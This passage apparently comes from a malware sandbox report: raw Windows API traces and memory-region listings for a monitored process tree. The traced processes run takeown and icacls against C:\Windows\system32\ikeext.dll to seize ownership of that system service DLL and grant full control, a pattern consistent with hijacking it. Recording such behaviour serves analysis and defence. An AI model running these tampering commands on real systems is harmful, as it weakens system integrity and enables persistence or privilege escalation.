_MaxCount=0x7) returned -12 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0047.654] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0047.655] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0047.655] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0047.655] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0047.655] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0047.655] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.656] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F C:\\Windows\\system32\\ikeext.dll", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x30f3f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F C:\\Windows\\system32\\ikeext.dll", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f43c | out: lpCommandLine="takeown /F C:\\Windows\\system32\\ikeext.dll", lpProcessInformation=0x30f43c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbb4, dwThreadId=0xbb8)) returned 1 [0047.841] CloseHandle (hObject=0x4c) returned 1 [0047.841] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.841] GetEnvironmentStringsW () returned 0xa0110* [0047.841] FreeEnvironmentStringsW (penv=0xa0110) returned 1 [0047.841] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0047.965] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f330 | out: lpExitCode=0x30f330*=0x0) returned 1 [0047.965] CloseHandle (hObject=0x50) returned 1 [0047.965] _vsnwprintf (in: _Buffer=0x30f478, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f33c | out: _Buffer="00000000") returned 8 [0047.965] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0047.965] GetEnvironmentStringsW () returned 0xa2088* [0047.965] FreeEnvironmentStringsW (penv=0xa2088) returned 1 [0047.965] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.965] GetEnvironmentStringsW () returned 0xa2088* [0047.965] FreeEnvironmentStringsW (penv=0xa2088) returned 1 [0047.965] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f394 | out: lpAttributeList=0x30f394) [0047.965] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.965] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.965] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.965] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0047.966] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.966] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0047.966] SetConsoleInputExeNameW () returned 0x1 [0047.966] GetConsoleOutputCP () returned 0x1b5 [0047.966] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.966] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.966] exit (_Code=0) Process: id = "11" image_name = "takeown.exe" filename = "c:\\windows\\system32\\takeown.exe" page_root = "0x7eef7740" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xba0" cmd_line = "takeown /F C:\\Windows\\system32\\ikeext.dll" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1047 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1048 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1049 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1050 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1051 start_va = 0xeb0000 end_va = 0xebefff entry_point = 0xeb0000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\System32\\takeown.exe" (normalized: "c:\\windows\\system32\\takeown.exe") Region: id = 1052 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1053 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1055 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1056 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1058 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1059 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1060 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1061 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1062 start_va = 0x71dd0000 end_va = 0x71de1fff entry_point = 0x71dd1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1063 start_va = 0x73e70000 end_va = 0x73e7efff entry_point = 0x73e712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1064 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1065 start_va = 0x73e90000 end_va = 0x73ea0fff entry_point = 0x73e91300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1066 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1067 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75291319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1068 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x753010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1069 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1070 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1071 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1072 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1073 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1074 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1075 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1076 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1077 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1078 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1079 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1080 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1081 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1082 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1083 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1084 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1085 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1086 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1087 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1088 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1089 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\System32\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\takeown.exe.mui") Region: id = 1090 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1091 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1092 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1093 start_va = 0x500000 end_va = 0x7cefff entry_point = 0x500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1094 start_va = 0xec0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 1095 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1096 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Thread: id = 44 os_tid = 0xbb8 Thread: id = 45 os_tid = 0xbbc Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef7720" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1097 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1098 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1099 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1100 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1101 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1102 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1103 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1104 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1105 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1106 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1107 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1108 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1109 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1110 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1111 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1112 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1113 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1114 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1115 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1116 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1117 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1118 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1119 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1120 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1121 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1122 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1123 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1124 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1125 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1126 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1127 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1128 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1129 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1130 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1131 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 46 os_tid = 0xbc4 [0048.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fab4 | out: lpSystemTimeAsFileTime=0x12fab4*(dwLowDateTime=0x4de39560, dwHighDateTime=0x1d34280)) [0048.013] GetCurrentProcessId () returned 0xbc0 [0048.013] GetCurrentThreadId () returned 0xbc4 [0048.013] GetTickCount () returned 0x13cd0 [0048.013] QueryPerformanceCounter (in: lpPerformanceCount=0x12faac | out: lpPerformanceCount=0x12faac*=316245130) returned 1 [0048.014] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0048.015] __set_app_type (_Type=0x1) [0048.015] __p__fmode () returned 0x768231f4 [0048.015] __p__commode () returned 0x768231fc [0048.015] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0048.015] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0048.015] GetCurrentThreadId () returned 0xbc4 [0048.015] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc4) returned 0x38 [0048.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.015] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0048.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.015] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa44 | out: phkResult=0x12fa44*=0x0) returned 0x2 [0048.015] VirtualQuery (in: lpAddress=0x12fa7b, lpBuffer=0x12fa14, dwLength=0x1c | out: lpBuffer=0x12fa14*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.016] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa14, dwLength=0x1c | out: lpBuffer=0x12fa14*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0048.016] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa14, dwLength=0x1c | out: lpBuffer=0x12fa14*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0048.016] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa14, dwLength=0x1c | out: lpBuffer=0x12fa14*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.016] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa14, dwLength=0x1c | out: lpBuffer=0x12fa14*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0048.016] GetConsoleOutputCP () returned 0x1b5 [0048.016] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.016] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0048.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.016] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0048.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.016] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.016] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.016] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.017] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.017] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0048.017] GetEnvironmentStringsW () returned 0x290130* [0048.017] FreeEnvironmentStringsW (penv=0x290130) returned 1 [0048.017] GetEnvironmentStringsW () returned 0x290130* [0048.017] FreeEnvironmentStringsW (penv=0x290130) returned 1 [0048.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9b4 | out: phkResult=0x12e9b4*=0x40) returned 0x0 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0xe0, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x1, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x0, lpData=0x12e9c0*=0x1, lpcbData=0x12e9b8*=0x1000) returned 0x2 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x0, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x40, lpcbData=0x12e9b8*=0x4) returned 0x0 [0048.017] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9bc, lpData=0x12e9c0, lpcbData=0x12e9b8*=0x1000 | out: lpType=0x12e9bc*=0x4, lpData=0x12e9c0*=0x40, 